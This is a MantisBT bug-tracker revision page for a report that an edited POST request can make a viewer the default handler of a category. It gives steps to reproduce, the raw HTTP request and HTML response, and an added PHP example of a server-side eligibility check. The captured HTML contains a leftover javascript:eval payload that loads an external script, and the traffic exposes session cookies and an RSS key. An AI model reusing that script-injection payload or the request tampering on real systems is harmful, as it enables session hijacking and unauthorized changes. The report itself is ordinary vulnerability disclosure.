View Revisions: Issue #27268

Summary 0027268: Admin can get issues assigned to users not allowed to handle them
Revision 2020-09-10 06:15 by dregad
Steps To Reproduce
  1. Log in as your admin account
  2. Go to manage > manage projects
  3. Open your intercept
  4. Select any member in the select input

Request:

POST /mantisbt2/manage_proj_cat_update.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 123
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt2/manage_proj_cat_edit_page.php?id=1&project_id=1
Cookie: MANTIS_collapse_settings=|sidebar:0; MANTIS_VIEW_ALL_COOKIE=1; MANTIS_secure_session=0; MANTIS_BUG_LIST_COOKIE=4; PHPSESSID=h4478kp8q2d69eg6e13pjo0hfe; MANTIS_STRING_COOKIE=7a01c128bae97499b78c1a52329936977c062961f7d9b57cd3d18980fdccc896
Upgrade-Insecure-Requests: 1

manage_proj_cat_update_token=<SOME-TOKEN>&project_id=1&category_id=1&name=General&assigned_to=<VULNERABLE>

Response:

HTTP/1.1 200 OK
Date: Thu, 10 Sep 2020 00:38:17 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 10 Sep 2020 00:38:17 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Thu, 10 Sep 2020 00:38:17 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Vary: Accept-Encoding
Content-Length: 10006
Connection: close
Content-Type: text/html; charset=UTF-8

EDIT (dregad): Moved HTML of success page to attachment.

  5. Edit assigned_to=<VULNERABLE> (I tried setting this to a viewer and this works)
  6. Refresh the site and the viewer now becomes assigned to the stuff
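The control the report shows to be missing is a server-side check that the user id submitted in assigned_to actually holds the project's handler access level before it is stored as the category's default handler; the dropdown only lists eligible users, but the POST body is trusted as-is. The following is an added illustration, not MantisBT's own code and not its fix for this issue: the MantisBT 2.x API functions it calls (require_api, access_has_project_level, access_ensure_project_level, config_get, user_exists, gpc_get_int, gpc_get_string, category_update, form_security_validate, form_security_purge, auth_reauthenticate) exist under those names, while the helper category_assignee_is_allowed() and the surrounding script skeleton are this example's own assumptions.

```php
<?php
# Added example: validating the assigned_to parameter of a category update.
# Assumes the MantisBT 2.x core API is loaded via core.php. The API function
# names are MantisBT's; the helper below and the script skeleton are illustrative.
require_once( 'core.php' );
require_api( 'access_api.php' );
require_api( 'authentication_api.php' );
require_api( 'category_api.php' );
require_api( 'config_api.php' );
require_api( 'form_api.php' );
require_api( 'gpc_api.php' );
require_api( 'user_api.php' );

/**
 * Return true if $p_user_id may be stored as default handler for $p_project_id.
 * NO_USER (0) means "unassigned" and is always acceptable; any other value must
 * be an existing account that meets the project's handle_bug_threshold.
 * (Hypothetical helper, not part of MantisBT.)
 */
function category_assignee_is_allowed( $p_project_id, $p_user_id ) {
	if( $p_user_id == NO_USER ) {
		return true;
	}
	if( !user_exists( $p_user_id ) ) {
		return false;
	}
	# handle_bug_threshold is the per-project access level required to handle
	# issues; a viewer-level account fails this test even when an administrator
	# submits its id.
	$t_threshold = config_get( 'handle_bug_threshold', null, null, $p_project_id );
	return access_has_project_level( $t_threshold, $p_project_id, $p_user_id );
}

form_security_validate( 'manage_proj_cat_update' );
auth_reauthenticate();

$f_project_id  = gpc_get_int( 'project_id' );
$f_category_id = gpc_get_int( 'category_id' );
$f_name        = trim( gpc_get_string( 'name' ) );
$f_assigned_to = gpc_get_int( 'assigned_to', NO_USER );

# The administrator's own right to edit the project is not the question here...
access_ensure_project_level( config_get( 'manage_project_threshold' ), $f_project_id );

# ...the chosen handler's right to handle issues in this project is. Rejecting
# the request here closes the gap the report demonstrates with an edited POST.
if( !category_assignee_is_allowed( $f_project_id, $f_assigned_to ) ) {
	trigger_error( ERROR_ACCESS_DENIED, ERROR );
}

category_update( $f_category_id, $f_name, $f_assigned_to );
form_security_purge( 'manage_proj_cat_update' );
```

The point of the placement is that the allow-list is enforced where the value is consumed, not only where the form is rendered: a filtered select input is a usability aid, and any client that edits the request body bypasses it, so the same eligibility rule must be re-evaluated on the server against the submitted user id.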
Revision 2020-09-09 20:43 by d3vpoo1
Steps To Reproduce
  1. Log in as your admin account
  2. Go to manage > manage projects
  3. Open your intercept
  4. Select any member in the select input

Request:

POST /mantisbt2/manage_proj_cat_update.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 123
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt2/manage_proj_cat_edit_page.php?id=1&project_id=1
Cookie: MANTIS_collapse_settings=|sidebar:0; MANTIS_VIEW_ALL_COOKIE=1; MANTIS_secure_session=0; MANTIS_BUG_LIST_COOKIE=4; PHPSESSID=h4478kp8q2d69eg6e13pjo0hfe; MANTIS_STRING_COOKIE=7a01c128bae97499b78c1a52329936977c062961f7d9b57cd3d18980fdccc896
Upgrade-Insecure-Requests: 1

manage_proj_cat_update_token=<SOME-TOKEN>&project_id=1&category_id=1&name=General&assigned_to=<VULNERABLE>

Response:

HTTP/1.1 200 OK
Date: Thu, 10 Sep 2020 00:38:17 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 10 Sep 2020 00:38:17 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Thu, 10 Sep 2020 00:38:17 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Vary: Accept-Encoding
Content-Length: 10006
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<title>MantisBT</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" />
<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/default.css" />
<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/status_config.php?cache_key=f4856b33b84f247924ce5769a9d0b2d2" />
<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/dropzone-5.5.0.min.css" />
<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/bootstrap-3.4.1.min.css" />
<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/font-awesome-4.6.3.min.css" />
<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/fonts.css" />
<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/bootstrap-datetimepicker-4.17.47.min.css" />
<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/ace.min.css" />
<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/ace-mantis.css" />
<link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/ace-skins.min.css" />

<link rel="shortcut icon" href="/mantisbt2/images/favicon.ico" type="image/x-icon" />
<link rel="search" type="application/opensearchdescription+xml" title="MantisBT: full-text search" href="http://localhost/mantisbt2/browser_search_plugin.php?type=text"/>
<link rel="search" type="application/opensearchdescription+xml" title="MantisBT: search by Issue Id" href="http://localhost/mantisbt2/browser_search_plugin.php?type=id"/>
<script type="text/javascript" src="/mantisbt2/javascript_config.php?cache_key=f4856b33b84f247924ce5769a9d0b2d2"></script>
<script type="text/javascript" src="/mantisbt2/javascript_translations.php?cache_key=3be95d1715b5c55a9480208daf800add"></script>
<script type="text/javascript" src="/mantisbt2/js/jquery-2.2.4.min.js"></script>
<script type="text/javascript" src="/mantisbt2/js/dropzone-5.5.0.min.js"></script>
<script type="text/javascript" src="/mantisbt2/js/common.js"></script>
<meta http-equiv="Refresh" content="1; URL=http://localhost/mantisbt2/manage_proj_page.php" />

</head>
<body class="skin-3">
<style>

* { font-family: "Open Sans"; }
h1, h2, h3, h4, h5 { font-family: "Open Sans"; }
</style>
    <div id="navbar" class="navbar navbar-default navbar-collapse navbar-fixed-top noprint"><div id="navbar-container" class="navbar-container"><button id="menu-toggler" type="button" class="navbar-toggle menu-toggler pull-left hidden-lg hidden-md" data-target="#sidebar"><span class="sr-only">Toggle sidebar</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><div class="navbar-header"><a href="/mantisbt2/my_view_page.php" class="navbar-brand"><span class="smaller-75"> MantisBT </span></a><button type="button" class="navbar-toggle navbar-toggle collapsed pull-right hidden-sm hidden-md hidden-lg" data-toggle="collapse" data-target=".navbar-buttons,.navbar-menu"><span class="sr-only">Toggle user menu</span><i class="ace-icon fa fa-user fa-2x white"></i> </button></div><div class="navbar-buttons navbar-header navbar-collapse collapse"><ul class="nav ace-nav"><li class="hidden-sm hidden-xs"><div class="btn-group btn-corner padding-right-8 padding-left-8"><a class="btn btn-primary btn-sm" href="bug_report_page.php"><i class="fa fa-edit"></i> Report Issue</a><a class="btn btn-primary btn-sm" href="manage_user_create_page.php"><i class="fa fa-user-plus"></i> Invite Users</a></div></li><li class="grey" id="dropdown_projects_menu">
    <a data-toggle="dropdown" href="#" class="dropdown-toggle">
     "> javascript:eval('var a=document.createElement(\'script\');a.src=\'0000160">https://mybl&0000160;
    <i class="ace-icon fa fa-angle-down bigger-110"></i>
    </a>
    <ul id="projects-list" class=" dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close">
    <li><div class="projects-searchbox"><input class="search form-control input-md" placeholder="Search" /></div></li><li class="divider"></li>
    <li><div class="scrollable-menu"><ul class="list dropdown-yellow no-margin"><li>/mantisbt2/set_project.php?project_id=0</li>
    <li class="divider"></li>
    <li class="active">/mantisbt2/set_project.php?project_id=1</li>
    </ul></div></li></ul>
    </li>
    <li class="grey"><a data-toggle="dropdown" href="#" class="dropdown-toggle"><i class="ace-icon fa fa-user fa-2x white"></i> <span class="user-info">administrator</span><i class="ace-icon fa fa-angle-down"></i></a><ul class="user-menu dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close"><li><a href="/mantisbt2/account_page.php"><i class="ace-icon fa fa-user"> </i> My Account</a></li><li><a href="http://localhost/mantisbt2/issues_rss.php?username=administrator&amp;key=nNUB0bUOFU1-De7V6n8RKAdmhJ6pi6Aa90nbcI9AxxsZbE1s_lH6wQuBjczaLZGNrGwqwTcaFunQLMtD04uK&amp;project_id=1"><i class="ace-icon fa fa-rss-square orange"> </i> RSS</a></li><li class="divider"></li><li><a href="/mantisbt2/logout_page.php"><i class="ace-icon fa fa-sign-out"> </i> Logout</a></li></ul></li></ul></div></div></div><div class="main-container" id="main-container">
    <div id="sidebar" class="sidebar sidebar-fixed responsive compact "><ul class="nav nav-list"><li>
    <a href="/mantisbt2/my_view_page.php">
    <i class="menu-icon fa fa-dashboard"></i>
    <span class="menu-text"> My View </span>
    </a>
    <b class="arrow"></b>
    </li>
    <li>
    <a href="/mantisbt2/view_all_bug_page.php">
    <i class="menu-icon fa fa-list-alt"></i>
    <span class="menu-text"> View Issues </span>
    </a>
    <b class="arrow"></b>
    </li>
    <li>
    <a href="/mantisbt2/bug_report_page.php">
    <i class="menu-icon fa fa-edit"></i>
    <span class="menu-text"> Report Issue </span>
    </a>
    <b class="arrow"></b>
    </li>
    <li>
    <a href="/mantisbt2/changelog_page.php">
    <i class="menu-icon fa fa-retweet"></i>
    <span class="menu-text"> Change Log </span>
    </a>
    <b class="arrow"></b>
    </li>
    <li>
    <a href="/mantisbt2/roadmap_page.php">
    <i class="menu-icon fa fa-road"></i>
    <span class="menu-text"> Roadmap </span>
    </a>
    <b class="arrow"></b>
    </li>
    <li>
    <a href="/mantisbt2/summary_page.php">
    <i class="menu-icon fa fa-bar-chart-o"></i>
    <span class="menu-text"> Summary </span>
    </a>
    <b class="arrow"></b>
    </li>
    <li class="active">
    <a href="/mantisbt2/manage_overview_page.php">
    <i class="menu-icon fa fa-gears"></i>
    <span class="menu-text"> Manage </span>
    </a>
    <b class="arrow"></b>
    </li>
    </ul><div id="sidebar-btn" class="sidebar-toggle sidebar-collapse"><i data-icon2="ace-icon fa fa-angle-double-right" data-icon1="ace-icon fa fa-angle-double-left"
    class="ace-icon fa fa-angle-double-left"></i></div></div><div class="main-content">
    <div id="breadcrumbs" class="breadcrumbs noprint">
    <ul class="breadcrumb">
    <li><i class="fa fa-user home-icon active"></i> /mantisbt2/account_page.php
    <span class="label hidden-xs label-default arrowed">administrator</span></li>
    </ul>
    <div class="nav-recent hidden-xs">Recently Visited: /mantisbt2/view.php?id=4, /mantisbt2/view.php?id=2, /mantisbt2/view.php?id=3, 0000001</div><div id="nav-search" class="nav-search"><form class="form-search" method="post" action="/mantisbt2/jump_to_bug.php"><span class="input-icon"><input type="text" name="bug_id" autocomplete="off" class="nav-search-input" placeholder="Issue #"><i class="ace-icon fa fa-search nav-search-icon"></i></span></form></div>
    </div>
    <div class="page-content">
    <div class="row">
    <div class="container-fluid"><div class="col-md-12 col-xs-12"><div class="space-0"></div><div class="alert alert-success center"><p class="bold bigger-110">Operation successful.</p><br /><div class="btn-group">manage_proj_page.php</div></div></div></div>
    </div>
    </div>
    </div>
    <div class="clearfix"></div>
    <div class="space-20"></div>
    <div class="footer noprint">
    <div class="footer-inner">
    <div class="footer-content">
    <div class="col-md-6 col-xs-12 no-padding">
    <address>
    <strong>Powered by https://www.mantisbt.org</strong> <br>
    <small>Copyright © 2000 - 2020 MantisBT Team</small><br><small>Contact webmaster@example.com for assistance</small><br>
    </address>
    </div>
    <div class="col-md-6 col-xs-12">
    <div class="pull-right" id="powered-by-mantisbt-logo">
    <a href="https://www.mantisbt.org" title="Mantis Bug Tracker: a free and open source web based bug tracking system."><img src="/mantisbt2/images/mantis_logo.png" width="102" height="35" alt="Powered by Mantis Bug Tracker: a free and open source web based bug tracking system." /></a>
    </div>
    </div>
    </div>
    </div>
    </div>
    <a class="btn-scroll-up btn btn-sm btn-inverse display" id="btn-scroll-up" href="#">
    <i class="ace-icon fa fa-angle-double-up icon-only bigger-110"></i>
    </a>
    </div>
    <script type="text/javascript" src="/mantisbt2/js/bootstrap-3.4.1.min.js"></script>
    <script type="text/javascript" src="/mantisbt2/js/moment-with-locales-2.24.0.min.js"></script>
    <script type="text/javascript" src="/mantisbt2/js/bootstrap-datetimepicker-4.17.47.min.js"></script>
    <script type="text/javascript" src="/mantisbt2/js/typeahead.jquery-1.3.0.min.js"></script>
    <script type="text/javascript" src="/mantisbt2/js/list-1.5.0.min.js"></script>
    <script type="text/javascript" src="/mantisbt2/js/ace.min.js"></script>
    </body>
    </html>
  5. Edit assigned_to=<VULNERABLE> (I tried setting this to a viewer and this works)
  6. Refresh the site and the viewer now becomes assigned to the stuff